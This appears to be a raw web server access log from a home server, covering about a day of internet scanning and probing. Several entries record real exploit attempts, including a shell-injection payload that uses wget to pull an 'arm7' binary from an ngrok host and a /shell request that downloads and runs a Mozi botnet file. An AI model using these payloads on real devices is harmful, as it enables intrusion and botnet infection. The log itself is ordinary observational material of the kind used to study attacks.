Wed Apr  8 06:25:06 MDT 2020
 06:25:06 up 43 days, 10:53,  1 user,  load average: 0.53, 0.32, 0.25
USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
pi       tty7     :0               24Feb20 43days 33:38   2.04s /usr/bin/lxsession -s LXDE-pi -e LXDE
216.238.230.141 - - [08/Apr/2020:12:32:18 +0000] "POST /cgi-bin/mainfunction.cgi?action=login&keyPath=%27%0A/bin/sh${IFS}-c${IFS}'cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}arm7;${IFS}busybox${IFS}wget${IFS}http://19ce033f.ngrok.io/arm7;${IFS}chmod${IFS}777${IFS HTTP/1.1" 400 0 "" ""
216.238.230.141 - - [08/Apr/2020:12:32:19 +0000] "UNKNOWN  UNKNOWN" 400 0 "" ""
37.6.98.122 - - [08/Apr/2020:12:35:22 +0000] "UNKNOWN  UNKNOWN" 400 0 "" ""
37.6.98.122 - - [08/Apr/2020:12:35:22 +0000] "UNKNOWN  UNKNOWN" 400 0 "" ""
79.167.164.14 - - [08/Apr/2020:12:38:09 +0000] "UNKNOWN  UNKNOWN" 400 0 "" ""
79.167.164.14 - - [08/Apr/2020:12:38:10 +0000] "UNKNOWN  UNKNOWN" 400 0 "" ""
181.143.70.194 - - [08/Apr/2020:12:52:27 +0000] "GET / HTTP/1.1" 200 25000 "" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36"
71.6.232.4 - - [08/Apr/2020:13:01:05 +0000] "GET / HTTP/1.1" 200 25000 "" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/57.0.2987.133 Safari/537.36"
128.14.134.170 - - [08/Apr/2020:13:05:51 +0000] "GET / HTTP/1.1" 200 25000 "" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 "
185.202.2.226 - - [08/Apr/2020:13:55:55 +0000] "UNKNOWN  UNKNOWN" 400 0 "" ""
49.49.243.109 - - [08/Apr/2020:14:09:45 +0000] "GET /manager/html HTTP/1.1" 404 0 "" "Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.2; WOW64; Trident/6.0)"
186.228.97.42 - - [08/Apr/2020:14:16:15 +0000] "GET / HTTP/1.1" 200 25000 "" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36"
24.93.200.253 - - [08/Apr/2020:14:19:04 +0000] "POST /cgi-bin/mainfunction.cgi HTTP/1.1" 404 0 "" "XTC"
24.93.200.253 - - [08/Apr/2020:14:19:04 +0000] "UNKNOWN  UNKNOWN" 400 0 "" ""
106.75.84.197 - - [08/Apr/2020:14:31:14 +0000] "GET / HTTP/1.0" 200 25000 "" ""
104.152.52.24 - - [08/Apr/2020:14:33:13 +0000] "GET / HTTP/1.0" 200 25000 "" "masscan/1.0 (https://github.com/robertdavidgraham/masscan)"
5.196.65.217 - - [08/Apr/2020:15:19:08 +0000] "GET / HTTP/1.0" 200 25000 "" "masscan/1.0 (https://github.com/robertdavidgraham/masscan)"
5.196.65.217 - - [08/Apr/2020:15:19:14 +0000] "GET / HTTP/1.0" 200 25000 "" "masscan/1.0 (https://github.com/robertdavidgraham/masscan)"
208.91.109.18 - - [08/Apr/2020:15:37:57 +0000] "UNKNOWN  UNKNOWN" 0 0 "" ""
208.91.109.18 - - [08/Apr/2020:15:37:57 +0000] "HEAD /robots.txt HTTP/1.0" 200 0 "" ""
192.241.237.193 - - [08/Apr/2020:15:58:21 +0000] "GET /portal/redlion HTTP/1.1" 404 0 "" "Mozilla/5.0 zgrab/0.x"
80.82.70.118 - - [08/Apr/2020:17:14:25 +0000] "UNKNOWN  UNKNOWN" 0 0 "" ""
49.234.81.16 - - [08/Apr/2020:17:20:33 +0000] "UNKNOWN  UNKNOWN" 400 0 "" ""
49.234.81.16 - - [08/Apr/2020:17:20:36 +0000] "GET /TP/public/index.php HTTP/1.1" 404 0 "" "Mozilla/5.0 (Windows; U; Windows NT 6.0;en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6)"
49.234.81.16 - - [08/Apr/2020:17:20:36 +0000] "GET /TP/index.php HTTP/1.1" 404 0 "" "Mozilla/5.0 (Windows; U; Windows NT 6.0;en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6)"
49.234.81.16 - - [08/Apr/2020:17:20:37 +0000] "GET /thinkphp/html/public/index.php HTTP/1.1" 404 0 "" "Mozilla/5.0 (Windows; U; Windows NT 6.0;en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6)"
49.234.81.16 - - [08/Apr/2020:17:20:37 +0000] "GET /html/public/index.php HTTP/1.1" 404 0 "" "Mozilla/5.0 (Windows; U; Windows NT 6.0;en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6)"
49.234.81.16 - - [08/Apr/2020:17:20:38 +0000] "GET /public/index.php HTTP/1.1" 404 0 "" "Mozilla/5.0 (Windows; U; Windows NT 6.0;en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6)"
49.234.81.16 - - [08/Apr/2020:17:20:39 +0000] "GET /TP/html/public/index.php HTTP/1.1" 404 0 "" "Mozilla/5.0 (Windows; U; Windows NT 6.0;en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6)"
49.234.81.16 - - [08/Apr/2020:17:20:39 +0000] "GET /elrekt.php HTTP/1.1" 404 0 "" "Mozilla/5.0 (Windows; U; Windows NT 6.0;en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6)"
49.234.81.16 - - [08/Apr/2020:17:20:40 +0000] "GET /index.php HTTP/1.1" 404 0 "" "Mozilla/5.0 (Windows; U; Windows NT 6.0;en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6)"
49.234.81.16 - - [08/Apr/2020:17:20:40 +0000] "GET / HTTP/1.1" 200 25000 "" "Mozilla/5.0 (Windows; U; Windows NT 6.0;en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6)"
187.19.30.76 - - [08/Apr/2020:18:36:58 +0000] "GET / HTTP/1.1" 200 25000 "" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36"
185.128.41.50 - - [08/Apr/2020:18:51:52 +0000] "GET /manager/html HTTP/1.1" 404 0 "" "Java/1.8.0_131"
201.192.158.71 - - [08/Apr/2020:19:02:05 +0000] "POST /cgi-bin/mainfunction.cgi?action=login&keyPath=%27%0A/bin/sh${IFS}-c${IFS}'cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}arm7;${IFS}busybox${IFS}wget${IFS}http://19ce033f.ngrok.io/arm7;${IFS}chmod${IFS}777${IFS HTTP/1.1" 400 0 "" ""
201.192.158.71 - - [08/Apr/2020:19:02:05 +0000] "UNKNOWN  UNKNOWN" 400 0 "" ""
92.118.160.25 - - [08/Apr/2020:19:11:26 +0000] "GET / HTTP/1.1" 200 25000 "" "NetSystemsResearch studies the availability of various services across the internet. Our website is netsystemsresearch.com"
103.26.221.81 - - [08/Apr/2020:19:29:48 +0000] "POST /cgi-bin/mainfunction.cgi?action=login&keyPath=%27%0A/bin/sh${IFS}-c${IFS}'cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}arm7;${IFS}busybox${IFS}wget${IFS}http://19ce033f.ngrok.io/arm7;${IFS}chmod${IFS}777${IFS HTTP/1.1" 400 0 "" ""
103.26.221.81 - - [08/Apr/2020:19:29:48 +0000] "UNKNOWN  UNKNOWN" 400 0 "" ""
113.220.118.114 - - [08/Apr/2020:20:02:45 +0000] "GET /shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.1" 404 0 "" "Hello, world"
195.181.84.148 - - [08/Apr/2020:20:42:47 +0000] "GET / HTTP/1.1" 200 25000 "" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36"
45.56.78.64 - - [08/Apr/2020:20:58:46 +0000] "GET /dbgeng.dll HTTP/1.1" 404 0 "" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)"
159.203.83.217 - - [08/Apr/2020:21:06:50 +0000] "GET / HTTP/1.0" 200 25000 "" "masscan/1.0 (https://github.com/robertdavidgraham/masscan)"
138.197.216.120 - - [08/Apr/2020:22:46:48 +0000] "GET / HTTP/1.0" 200 25000 "" "masscan/1.0 (https://github.com/robertdavidgraham/masscan)"
138.197.216.120 - - [08/Apr/2020:22:46:51 +0000] "GET / HTTP/1.0" 200 25000 "" "masscan/1.0 (https://github.com/robertdavidgraham/masscan)"
123.206.206.45 - - [08/Apr/2020:23:23:00 +0000] "UNKNOWN  UNKNOWN" 400 0 "" ""
185.82.212.4 - - [08/Apr/2020:23:48:00 +0000] "HEAD / HTTP/1.0" 200 0 "" ""
45.124.51.138 - - [09/Apr/2020:00:22:43 +0000] "GET / HTTP/1.1" 200 25000 "" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36"
35.160.231.6 - - [09/Apr/2020:01:05:28 +0000] "GET /phpMyAdmin/scripts/setup.php HTTP/1.1" 404 0 "" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:57.0) Gecko/20100101 Firefox/57.0"
35.160.231.6 - - [09/Apr/2020:01:05:29 +0000] "GET / HTTP/1.1" 200 25000 "" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:57.0) Gecko/20100101 Firefox/57.0"
35.160.231.6 - - [09/Apr/2020:01:05:30 +0000] "GET /horde/imp/test.php HTTP/1.1" 404 0 "" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:57.0) Gecko/20100101 Firefox/57.0"
35.160.231.6 - - [09/Apr/2020:01:05:30 +0000] "GET /login?from=0.000000 HTTP/1.1" 404 0 "" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:57.0) Gecko/20100101 Firefox/57.0"
139.162.106.181 - - [09/Apr/2020:03:03:17 +0000] "GET / HTTP/1.1" 200 25000 "" "HTTP Banner Detection (https://security.ipip.net)"
187.110.208.2 - - [09/Apr/2020:03:29:32 +0000] "GET / HTTP/1.1" 200 25000 "" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36"
47.101.202.135 - - [09/Apr/2020:04:25:19 +0000] "GET / HTTP/1.1" 200 25000 "" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:36.0) Gecko/20100101 Firefox/36.0"
162.243.128.94 - - [09/Apr/2020:04:25:21 +0000] "GET /hudson HTTP/1.1" 404 0 "" "Mozilla/5.0 zgrab/0.x"
177.189.18.217 - - [09/Apr/2020:05:13:36 +0000] "GET / HTTP/1.1" 200 25000 "" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36"
162.243.130.200 - - [09/Apr/2020:06:03:40 +0000] "UNKNOWN  UNKNOWN" 400 0 "" ""
185.153.197.104 - - [09/Apr/2020:06:51:06 +0000] "UNKNOWN  UNKNOWN" 400 0 "" ""
185.153.197.104 - - [09/Apr/2020:06:54:58 +0000] "UNKNOWN  UNKNOWN" 400 0 "" ""
138.197.216.120 - - [09/Apr/2020:08:22:36 +0000] "GET / HTTP/1.0" 200 25000 "" "masscan/1.0 (https://github.com/robertdavidgraham/masscan)"
162.243.133.193 - - [09/Apr/2020:08:47:24 +0000] "GET / HTTP/1.1" 200 25000 "" "Mozilla/5.0 zgrab/0.x"
18.216.101.85 - - [09/Apr/2020:08:50:00 +0000] "GET /phpMyAdmin/scripts/setup.php HTTP/1.1" 404 0 "" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:57.0) Gecko/20100101 Firefox/57.0"
18.216.101.85 - - [09/Apr/2020:08:50:00 +0000] "GET / HTTP/1.1" 200 25000 "" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:57.0) Gecko/20100101 Firefox/57.0"
18.216.101.85 - - [09/Apr/2020:08:50:01 +0000] "GET /horde/imp/test.php HTTP/1.1" 404 0 "" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:57.0) Gecko/20100101 Firefox/57.0"
18.216.101.85 - - [09/Apr/2020:08:50:01 +0000] "GET /login?from=0.000000 HTTP/1.1" 404 0 "" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:57.0) Gecko/20100101 Firefox/57.0"
185.59.66.233 - - [09/Apr/2020:09:44:25 +0000] "POST /boaform/admin/formPing HTTP/1.1" 400 0 "" "polaris botnet"
185.59.66.233 - - [09/Apr/2020:09:44:25 +0000] "UNKNOWN  UNKNOWN" 400 0 "" ""
2.237.2.161 - - [09/Apr/2020:09:59:36 +0000] "POST /cgi-bin/mainfunction.cgi?action=login&keyPath=%27%0A/bin/sh${IFS}-c${IFS}'cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}arm7;${IFS}busybox${IFS}wget${IFS}http://19ce033f.ngrok.io/arm7;${IFS}chmod${IFS}777${IFS HTTP/1.1" 400 0 "" ""
2.237.2.161 - - [09/Apr/2020:09:59:37 +0000] "UNKNOWN  UNKNOWN" 400 0 "" ""
223.167.32.200 - - [09/Apr/2020:10:02:25 +0000] "UNKNOWN  UNKNOWN" 400 0 "" ""
223.167.32.200 - - [09/Apr/2020:10:02:47 +0000] "GET / HTTP/1.1" 200 25000 "" "Mozilla/5.0 (Windows NT 5.1; rv:9.0.1) Gecko/20100101 Firefox/9.0.1"
223.167.32.200 - - [09/Apr/2020:10:03:52 +0000] "GET /sqlite/main.php HTTP/1.1" 404 0 "http://162.250.19.7/" "Mozilla/5.0 (Windows NT 5.1; rv:9.0.1) Gecko/20100101 Firefox/9.0.1"
223.167.32.200 - - [09/Apr/2020:10:03:53 +0000] "GET /sqlitemanager/main.php HTTP/1.1" 404 0 "http://162.250.19.7/" "Mozilla/5.0 (Windows NT 5.1; rv:9.0.1) Gecko/20100101 Firefox/9.0.1"
223.167.32.200 - - [09/Apr/2020:10:03:53 +0000] "GET /SQLiteManager/main.php HTTP/1.1" 404 0 "http://162.250.19.7/" "Mozilla/5.0 (Windows NT 5.1; rv:9.0.1) Gecko/20100101 Firefox/9.0.1"
223.167.32.200 - - [09/Apr/2020:10:03:54 +0000] "GET /SQLite/main.php HTTP/1.1" 404 0 "http://162.250.19.7/" "Mozilla/5.0 (Windows NT 5.1; rv:9.0.1) Gecko/20100101 Firefox/9.0.1"
223.167.32.200 - - [09/Apr/2020:10:03:54 +0000] "GET /SQlite/main.php HTTP/1.1" 404 0 "http://162.250.19.7/" "Mozilla/5.0 (Windows NT 5.1; rv:9.0.1) Gecko/20100101 Firefox/9.0.1"
223.167.32.200 - - [09/Apr/2020:10:03:55 +0000] "GET /main.php HTTP/1.1" 404 0 "http://162.250.19.7/" "Mozilla/5.0 (Windows NT 5.1; rv:9.0.1) Gecko/20100101 Firefox/9.0.1"
223.167.32.200 - - [09/Apr/2020:10:03:55 +0000] "GET /test/sqlite/SQLiteManager-1.2.0/SQLiteManager-1.2.0/main.php HTTP/1.1" 404 0 "http://162.250.19.7/" "Mozilla/5.0 (Windows NT 5.1; rv:9.0.1) Gecko/20100101 Firefox/9.0.1"
223.167.32.200 - - [09/Apr/2020:10:03:59 +0000] "GET /SQLiteManager-1.2.4/main.php HTTP/1.1" 404 0 "http://162.250.19.7/" "Mozilla/5.0 (Windows NT 5.1; rv:9.0.1) Gecko/20100101 Firefox/9.0.1"
223.167.32.200 - - [09/Apr/2020:10:04:08 +0000] "GET /agSearch/SQlite/main.php HTTP/1.1" 404 0 "http://162.250.19.7/" "Mozilla/5.0 (Windows NT 5.1; rv:9.0.1) Gecko/20100101 Firefox/9.0.1"
176.113.115.249 - - [09/Apr/2020:10:04:37 +0000] "UNKNOWN  UNKNOWN" 400 0 "" ""
169.197.108.6 - - [09/Apr/2020:10:34:37 +0000] "GET /solr/ HTTP/1.1" 404 0 "" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 "
74.85.126.174 - - [09/Apr/2020:10:59:57 +0000] "GET /phpMyAdmin/scripts/setup.php HTTP/1.1" 404 0 "" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:57.0) Gecko/20100101 Firefox/57.0"
74.85.126.174 - - [09/Apr/2020:10:59:57 +0000] "GET / HTTP/1.1" 200 25000 "" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:57.0) Gecko/20100101 Firefox/57.0"
74.85.126.174 - - [09/Apr/2020:10:59:58 +0000] "GET /horde/imp/test.php HTTP/1.1" 404 0 "" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:57.0) Gecko/20100101 Firefox/57.0"
74.85.126.174 - - [09/Apr/2020:10:59:58 +0000] "GET /login?from=0.000000 HTTP/1.1" 404 0 "" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:57.0) Gecko/20100101 Firefox/57.0"
128.14.209.154 - - [09/Apr/2020:11:33:06 +0000] "GET / HTTP/1.1" 200 25000 "" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 "
Thu Apr  9 06:25:07 MDT 2020
 06:25:07 up 44 days, 10:53,  1 user,  load average: 0.55, 0.28, 0.24
USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
pi       tty7     :0               24Feb20 44days 34:13   2.04s /usr/bin/lxsession -s LXDE-pi -e LXDE